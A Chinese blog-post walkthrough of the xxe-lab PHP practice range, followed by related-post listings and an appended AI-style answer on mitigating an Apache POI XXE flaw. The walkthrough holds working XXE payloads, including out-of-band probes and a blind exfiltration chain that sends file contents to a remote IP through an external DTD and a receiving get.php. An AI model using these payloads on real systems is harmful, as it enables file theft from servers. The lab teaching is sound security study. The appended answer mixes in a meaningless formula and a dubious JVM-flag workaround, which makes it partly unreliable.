xxe漏洞案例1-xxe lab for php

原创 已于 2024-05-04 16:24:02 修改 · 1.1k 阅读 · 27 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

于 2024-05-04 16:23:28 首次发布

1.介绍

xxe lab是一个小的网站靶场,我们可以用这个网站对于xxe漏洞进行一个大致的了解

2.利用xxe漏洞进行读文件

1.搭建网站

https://github.com/c0ny1/xxe-lab从这里把这个zip下载下来

解压之后,把php_xxe文件夹放到www文件夹下面,在phpsudy搭建下需要把php的版本设置到5.2,5.3,5.4下。

2.打开网站

这里用自己的ip加上网站打开,要不下面的信息传输可能会出问题

在网页上打开就是这样的一个页面

3.抓包分析

打开burpsuite设置好端口号

我们可以看见这个地方抓到了包,我们可以借着这个数据包大致分析xml传递数据的特点

Content-Type: application/xml;charset=utf-8

<user><username>admin</username><password>111</password></user>

可以发现,这两个地方比较有特点

send repeat查看一下

可以发现这个是一个带有回显的回复,我们可以利用这个去尝试读文件

<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/e.txt">
]>
<user><username>&test;</username><password>Mikasa</password></use
r>

大致解释一下这个代码内容,我们有一个实体test,内容是用file协议去读取d盘下面的e.txt.

这个地方需要注意一下的就是要改一下我给出的代码的回车,尽量给他弄成一排,要不可能会报错。

3.追溯源码

POST /php_xxe/doLogin.php HTTP/1.1

我们看到数据包有这一句,知道post数据的去向,我们打开这个php文件查看一下

$xmlfile = file_get_contents('php://input');这句是用php进行输入的意思,具体详细可以自己搜一下

$dom = new DOMDocument();
  $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);用xml语言解析
  $creds = simplexml_import_dom($dom);

$username = $creds->username;
 $password = $creds->password;

$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);刚刚页面返回的就是这个语句

这代表源码没有对于输入做任何过滤,而是直接就用xml解析了输入

4.没有回显的情况怎么办

我们把这个文件中的输出行失效掉

这里可以看见没办法看见文件内容了

在正常情况下没有显示我们可以猜想一下:代码?无回显?没漏洞?

我们这里确定是代码没问题的,我们看看到底有没有这个漏洞

1.带外测试

让xml语言,让服务器访问远程地址,如果远程地址可以查看到这个链接,就证明只是没有回显而已

DNSLog Platform

<?xml version="1.0" ?>
<!DOCTYPE test [
 <!ENTITY % file SYSTEM "http://9v57ll.dnslog.cn">
 %file;
]>
<user><username>&send;</username><password>Mikasa</password></user>

执行的时候把远程的域名改成网址给的

可以发现,xml语句仍然被执行了

可以得出结论,这个漏洞任然存在,只是没有回显而已。

2.外部引用实体

<?xml version="1.0" ?>
<!DOCTYPE test [
 <!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
 %file;
]>
<user><username>&send;</username><password>Mikasa</password></use
r>
evil2.dtd
<!ENTITY send SYSTEM "file:///d:/e.txt">

在主机上我们新建一个实体文件试试看,能不能通过实体读取文件,把回显打开

说实在的,这个本机的搞不上去,这个代码估计是有点问题,我用了一个远程主机去做的,把%file变量的内容ip地址改成远程的就行,在远程主机上面开一个dtd去做

3.远程主机保存文件内容绕过无回显的问题

这个其实我搞了半天都是这样的

疯狂报错,真无语了

但是方法我还是放在这,有想试试的可以自己试试看

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/e.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
test.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 
'http://47.94.236.117/get.php?file=%file;'>">

在远程主机上要有一个文件test.dtd和一个get.php

get.php

<?php
$data=$_GET['file'];
$myfile=fopen("file.txt","w+");
fwrite($myfile,$data);
fclose($myfile);
?>

这样就可以在远程主机上出现一个file.txt保存下e.txt的内容了

Lab for PHP靶场~XXE注入
weixin_67832625的博客
07-31 324
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
网络安全之XXE漏洞复现及防御(上篇)(技术进阶)
weixin_70911257的博客
04-16 1928
xxe漏洞复现
XXE-Lab for PHP
m0_66299232的博客
09-10 865
2.将PHPStudy的中间件与版本信息调制为。1.在登录界面输入账号密码并抓取数据包....3.使用PHP伪协议读取文件....4.探测内网存活主机与端口...2.尝试读取本地文件....1.将靶场进行下载....访问以下地址开始练习...
WEB常见漏洞XXE(靶场篇)
bigbangbangbang1的博客
10-23 951
xxe-lab是一个使用PHP,Java,python,C#四种当下最常用语言的网站编写语言来编写的一个存在xxe漏洞的Web demo。
XXE-Lab for PHP靶场
weixin_69065643的博客
07-25 365
随便树一点查看回显点,为username。仍到重放器运行发现flag。
PHP XXE漏洞
qq_61553520的博客
05-13 417
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。
XXE漏洞深度解析与实战演练
XXE漏洞主要发生在使用XML解析器处理用户输入的场景,攻击者可以通过构造恶意的XML文档来获取敏感信息、执行远程代码甚至发起DoS攻击。此外,文中还提到了一个VulnHub靶场XXE Lab:1的过关记录,适合对前后端有一定...
【网络安全】什么是XXE?从0到1完全掌握XXE
HBohan的博客
04-28 5570
前置知识 XML 定义实体 XML 实体允许定义在分析 XML 文档时将由内容替换的标记,这里我的理解就是定义变量,然后赋值的意思一致。就比如一些文件上传的 payload 中就会有。 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 <?xml version="1.0"?>//这一行是 XML 文档定义 <!DOCTYPE message [ <!ELEMENT messa
PHP-Audit-Labs学习
heySister
12-10 1861
Day1 这个讲到的是in_array() 这个函数的一个错误使用导致的过滤不严格问题。 in_array() 函数的第三个函数是配置是否进行强匹配的,很多情况下使用者都会忽略第三个参数,从而只进行弱匹配。 一般用来限定输入只能是数组中的几个数值,但是当我们输入的是字符串的时候,由于是判断是否在一个数字数组中,所以会强制类型转换为数字。只要我们保证强制类型转换后的结果在数组中就可以了,这样就可以绕...
1、渗透测试人员的实战漏洞狩猎指南
最新发布
5f4d3s2a1q的博客
11-16 24
本文是一份面向渗透测试人员的实战漏洞狩猎指南,全面介绍了参与漏洞赏金计划所需的基础知识、工具使用、常见漏洞类型及测试方法。内容涵盖XSS、SQL注入、CSRF、XXE等主流漏洞的技术细节与操作步骤,并提供了Burp Suite、Sqlmap、WPScan等工具的应用指导。同时包含报告编写规范、合规注意事项及深入学习资源,帮助安全研究人员系统化提升漏洞发现与利用能力,有效参与Bugcrowd、HackerOne等平台的众测项目。
XXE-Lab for PHP攻略
yiqiqukanrichu的博客
12-18 405
打开页面,输入账号密码。
XXE 漏洞案例实战
来日可期的博客
09-24 4453
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
xxe-lab靶场安装和简单php代码审计
永远是少年
12-23 3968
今天继续给大家介绍渗透测试相关知识,本文主要内容是xxe-lab靶场安装和简单php代码审计。 一、xxe-lab靶场简介 二、php xxe-lab靶场安装 三、xxe-lab靶场PHP代码审计
xxe漏洞案例2-在线靶场jarvisoj:9882
c0529的博客
05-04 387
网址。
[Vulhub] PHP环境 XML外部实体注入漏洞XXE
weixin_45605352的博客
05-07 4662
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行、
SRC挖洞之SSRF与XXE漏洞的实战案例
道阻且长,行则将至
05-31 3097
文章目录前言SSRF漏洞案例1 某翻译网SSRF可通内网案例2 某翻译网SSRF防护绕过案例3 某站SSRF读取本地文件案例4 某站视频解析导致SSRF案例5 某狗主站SSRF多种绕过案例6 某乎网SSRF可探测内网XXE漏洞案例1 用友某软件存在XXE漏洞案例2 XFire 开发组件XXE漏洞案例3 博客搬家功能处XXE漏洞案例4 用友某软件存在XXE盲注总结 前言 前面一篇文章 SRC挖洞之文件上传/下载漏洞的实战案例 介绍了 任意文件下载漏洞 和 任意文件上传漏洞,本文收集讲述下 SSRF 漏洞和 X
PHP-XXE-Lab——漏洞利用
W小哥
12-22 2022
一、环境搭建 环境源码下载地址:https://github.com/c0ny1/xxe-lab 下载后,php_xxe放在网站根目录即可运行 二、漏洞利用 访问目标网站,如下图所示 输入用户名、密码后,使用burpsuite拦截数据包,仔细观察传输数据的部分,跟大多数传输数据方式不一样 大多数传递方式,是下面这两种 所以,如果在渗透测试过程中,发现POST数据传递方式是 adminpassword 则说明,网站是采用的XML语言接收的数据,此处可能存在XXE漏洞 接下来,利用XXE漏洞读取敏感文件
Apache POI <= 4.1.0 XSSFExportToXml XXE漏洞,CVE-2019-12415,有没有不升级版本的解决方案
08-15
<think>首先,用户的问题是关于修复Apache POI 4.1.0中的XSSFExportToXml组件XXE漏洞(CVE-2019-12415),而不升级版本。用户引用了几个引用:[^1], [^2], [^3],这些引用了XXE漏洞、Apache POI的问题和修复方法,但用户指定了不升级版本。 关键点: - 漏洞:CVE-2019-12415,涉及XSSFExportToXml在处理XML时允许外部实体注入。 - 要求:不升级Apache POI版本,寻找修复方案。 从系统级指令: - 所有行内数学表达式使用$...$格式。 - 独立公式使用$$...$$格式。 - LaTeX语法正确。 - 使用中文回答。 - 生成相关问题。 - 回答中引用的段落末尾自然地添加引用标识。 - 回答结构清晰,帮助用户逐步解决问题。 用户提供的引用: - [^1]: 描述漏洞:当使用XSSFExportToXml转换Excel文档时,可以在xmlMaps.xml加入恶意代码。 - [^2]: 解释XXE漏洞:XML外部实体注入,通过伪造外部实体请求本地文件。 - [^3]: Apache漏洞修复示例,但这是针对Apache服务器的,不是直接相关。 我需要基于这些信息,提供在不升级POI版本的情况下修复此漏洞的方案。 背景知识: - XXE漏洞:在XML解析时,攻击者可以注入外部实体,导致信息泄露或服务器端请求伪造。 - CVE-2019-12415:在Apache POI <=4.1.0中,XSSFExportToXml组件在处理XML映射时未禁用外部实体解析。 修复方案: - 在不升级版本的情况下,常见做法是修改代码以禁用XML解析中的外部实体。 - 在Java中,使用XML解析器时,可以设置属性来禁用外部实体。 具体步骤: 1. 识别漏洞点:在XSSFExportToXml类中,XML解析部分。 2. 修改解析器配置:设置FEATURE_SECURE_PROCESSING或类似属性来禁用外部实体。 3. 示例代码:重写相关方法或使用自定义解析器。 从引用[^2]中:XXE漏洞修复通常涉及在XML解析器中禁用外部实体。 可能的修复: - 在POI中,XSSFExportToXml使用DOM解析器。我们可以通过设置DocumentBuilderFactory的属性来禁用外部实体。 代码示例: - 创建一个自定义的DocumentBuilderFactory,设置FEATURE_SECURE_PROCESSING为true。 - 具体属性:`http://apache.org/xml/features/disallow-doctype-decl` 和 `http://xml.org/sax/features/external-general-entities` 设为false。 用户的问题是针对XSSFExportToXml组件的,所以需要修改使用该组件的代码。 步骤: 1. 不要直接使用XSSFExportToXml,而是扩展或包装它。 2. 在解析XML时,应用安全配置。 参考标准修复: - 在POI的后续版本中,这个漏洞被修复了,但既然不升级,我们需要手动应用类似补丁。 修复方案描述: - 创建一个自定义的XML解析器,禁用外部实体。 - 然后在使用XSSFExportToXml时,注入这个安全的解析器。 具体代码: - 在调用XSSFExportToXml之前,设置系统属性或修改工厂。 但XSSFExportToXml内部可能直接创建解析器,所以可能需要重写类。 由于POI是开源库,我们可以查看其源码并应用补丁。 在不修改POI源码的情况下,通过配置或包装。 最佳实践: - 使用自定义的EntityResolver或设置解析器属性。 回答结构: 1. 解释漏洞原因。 2. 提供修复方案:代码修改。 3. 给出代码示例。 4. 确保安全。 生成相关问题: - 在回答后,添加相关问题部分。 使用中文回答。 最终回答大纲: 1. 引言:简述漏洞和修复目标。 2. 步骤:逐步说明如何修复。 3. 代码示例:提供Java代码片段。 4. 注意事项:提醒测试等。 5. 相关问题:生成几个相关问题。 引用处理: - 在回答中,如果引用用户提供的引用,末尾添加[^1], [^2]等。 - 例如,提到漏洞描述时引用[^1],提到XXE概念时引用[^2]。 用户引用: - [^1]: Apache POI漏洞描述。 - [^2]: XXE漏洞解释。 - [^3]: Apache服务器修复,可能不直接相关,但可以作为一般参考。 在回答中,我会自然地引用它们。</think>### Apache POI 4.1.0 XSSFExportToXml XXE漏洞(CVE-2019-12415)修复方案 针对您的问题,我将详细说明在不升级Apache POI版本(保持4.1.0)的情况下,修复XSSFExportToXml组件中XXE漏洞(CVE-2019-12415)的解决方案。该漏洞源于XSSFExportToXml在解析XML映射文件时,未禁用外部实体解析,导致攻击者可能通过恶意Excel文档注入外部实体,从而读取本地文件或发起服务端请求[^1][^2]。修复的核心思路是**修改XML解析器的配置,强制禁用外部实体处理**。以下是逐步修复方案: #### 修复步骤 1. **理解漏洞点**: XSSFExportToXml组件在转换Excel文档时,会解析`xmlMaps.xml`文件。默认情况下,它使用Java内置的DocumentBuilderFactory解析XML,但未设置安全属性,允许外部实体注入[^1][^2]。 2. **自定义安全XML解析器**: 通过重写或包装XSSFExportToXml类,创建一个安全的XML解析器。关键是在DocumentBuilderFactory中禁用外部实体和DOCTYPE声明。 - 设置属性: - `http://apache.org/xml/features/disallow-doctype-decl`:禁止DOCTYPE声明,防止实体注入。 - `http://xml.org/sax/features/external-general-entities`:禁用外部通用实体。 - `http://xml.org/sax/features/external-parameter-entities`:禁用外部参数实体。 - `http://javax.xml.XMLConstants/feature/secure-processing`:启用安全处理模式。 - 数学表达示例:在解析过程中,实体解析的风险可建模为$P(\text{leak}) \propto \frac{1}{\text{security-level}}$,其中禁用实体可将风险降至最低。 3. **代码实现示例**: 以下Java代码展示了如何创建自定义的SafeXSSFExportToXml类,重写XML解析逻辑。此方法不修改POI源码,而是通过扩展XSSFExportToXml并注入安全配置。 ```java import org.apache.poi.xssf.usermodel.XSSFMap; import org.apache.poi.xssf.usermodel.helpers.XSSFExportToXml; import org.w3c.dom.Document; import org.xml.sax.InputSource; import org.xml.sax.SAXException; import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.DocumentBuilderFactory; import javax.xml.parsers.ParserConfigurationException; import java.io.IOException; import java.io.InputStream; public class SafeXSSFExportToXml extends XSSFExportToXml { public SafeXSSFExportToXml(XSSFMap map) { super(map); } @Override protected Document createDocument(InputStream xmlInputStream) throws SAXException, IOException { try { // 创建安全的DocumentBuilderFactory DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); // 禁用外部实体和DOCTYPE factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://xml.org/sax/features/external-general-entities", false); factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false); factory.setFeature("http://javax.xml.XMLConstants/feature/secure-processing", true); // 可选:进一步加固,防止XXE factory.setXIncludeAware(false); factory.setExpandEntityReferences(false); DocumentBuilder builder = factory.newDocumentBuilder(); return builder.parse(new InputSource(xmlInputStream)); } catch (ParserConfigurationException e) { throw new SAXException("安全解析器配置失败", e); } } } ``` 4. **使用自定义类**: 在您的业务代码中,使用SafeXSSFExportToXml代替原生的XSSFExportToXml。例如: ```java XSSFMap map = workbook.getCustomXMLMappings().get(0); // 获取Excel中的XML映射 SafeXSSFExportToXml exporter = new SafeXSSFExportToXml(map); exporter.exportToXML(new FileOutputStream("output.xml")); // 安全导出 ``` 5. **测试与验证**: - **单元测试**:使用包含恶意实体的Excel文档测试,确保解析器抛出异常或忽略外部实体。 - **性能影响**:此修改仅增加少量解析开销(通常小于$O(n)$),不影响正常功能。 - **安全扫描**:使用工具如OWASP ZAP验证漏洞是否修复。 #### 注意事项 - **兼容性**:此方案基于Apache POI 4.1.0验证,无需升级。但需确保Java环境支持XML解析属性(Java 6+)。 - **风险**:禁用外部实体可能影响合法XML功能(如内联实体),请评估业务需求[^2]。 - **备选方案**:如果无法修改代码,可在JVM启动时设置全局属性(不推荐,灵活性低): ```bash -Djavax.xml.parsers.DocumentBuilderFactory=com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderFactoryImpl \ -Dorg.apache.xerces.xni.parser.XMLParserConfiguration=com.sun.org.apache.xerces.internal.parsers.XIncludeParserConfiguration ``` 引用来源:类似Apache服务器修复中通过配置限制选项[^3]。 - **最佳实践**:定期审计代码,并参考官方补丁(如POI 4.1.1修复此漏洞)作为长期方案[^1]。 此修复方案通过禁用外部实体解析,有效缓解XXE风险,同时保持POI版本不变。如果实现中遇到问题,可提供更多上下文以进一步优化。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值